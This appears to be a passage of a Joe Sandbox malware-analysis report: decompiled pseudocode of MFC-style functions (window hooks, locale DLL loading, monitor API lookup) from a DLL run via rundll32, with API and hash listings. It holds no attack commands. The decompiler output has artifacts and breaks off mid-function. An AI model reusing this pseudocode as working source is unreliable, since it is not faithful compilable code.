								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

APIs

Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F

ScreenToClient.USER32 ref: 1002FEA5
GetKeyState.USER32 ref: 1002FF02
GetKeyState.USER32 ref: 1002FF4A
GetKeyState.USER32 ref: 1002FF84
KillTimer.USER32(?,0000E001), ref: 1002FFA9
IsWindow.USER32(?), ref: 1002FFF5

Strings

(, xrefs: 1002FEC9

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$ClientKillParentScreenTimerWindow
String ID: (
API String ID: 1540673551-3887548279
Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

APIs

GetKeyState.USER32 ref: 10032A3E
GetKeyState.USER32 ref: 10032A4E
GetFocus.USER32 ref: 10032A5E
GetDesktopWindow.USER32 ref: 10032A66
SendMessageA.USER32 ref: 10032A8A
SendMessageA.USER32 ref: 10032AA9
GetParent.USER32(00000000), ref: 10032AB2

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
librarystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}

APIs

lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
LoadLibraryA.KERNEL32(?), ref: 1003491A
GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A

Strings

LOC, xrefs: 100348E1

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLibraryLoadLocalelstrcpy
String ID: LOC
API String ID: 864663389-519433814
Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90

Uniqueness

Uniqueness Score: -1.00%

Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0x12db9c4b
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
GetVersion.KERNEL32 ref: 100349FB
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
ConvertDefaultLocale.KERNEL32(761B4DE0), ref: 10034A98
RegCloseKey.ADVAPI32(?), ref: 10034AA3

Strings

ntdll.dll, xrefs: 10034AAB
GetSystemDefaultUILanguage, xrefs: 100349C2
kernel32.dll, xrefs: 1003496F
Control Panel\Desktop\ResourceLocale, xrefs: 10034A13
GetUserDefaultUILanguage, xrefs: 1003497E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 780041395-483790700
Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0x12db9c4b
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}

APIs

Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A

CallNextHookEx.USER32 ref: 10023604
GetClassLongA.USER32 ref: 10023649
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10023675
lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
SetWindowLongA.USER32 ref: 100236BE
CallNextHookEx.USER32 ref: 100237C2
UnhookWindowsHookEx.USER32(?), ref: 100237D3

Strings

AfxOldWndProc423, xrefs: 10023779, 1002377E, 1002378B, 10023795, 100237A0
#32768, xrefs: 100236FF, 10023704, 10023750
ime, xrefs: 1002367E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
String ID: #32768$AfxOldWndProc423$ime
API String ID: 3204395069-4034971020
Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A

Strings

EnumDisplayDevicesA, xrefs: 10007A44
GetMonitorInfoA, xrefs: 10007A33
MonitorFromRect, xrefs: 10007A00
EnumDisplayMonitors, xrefs: 10007A22
USER32, xrefs: 100079BE
MonitorFromPoint, xrefs: 10007A11
MonitorFromWindow, xrefs: 100079EF
GetSystemMetrics, xrefs: 100079DE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A

Uniqueness

Uniqueness Score: -1.00%

Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0x12db9c4b
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0x12db9c4b
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
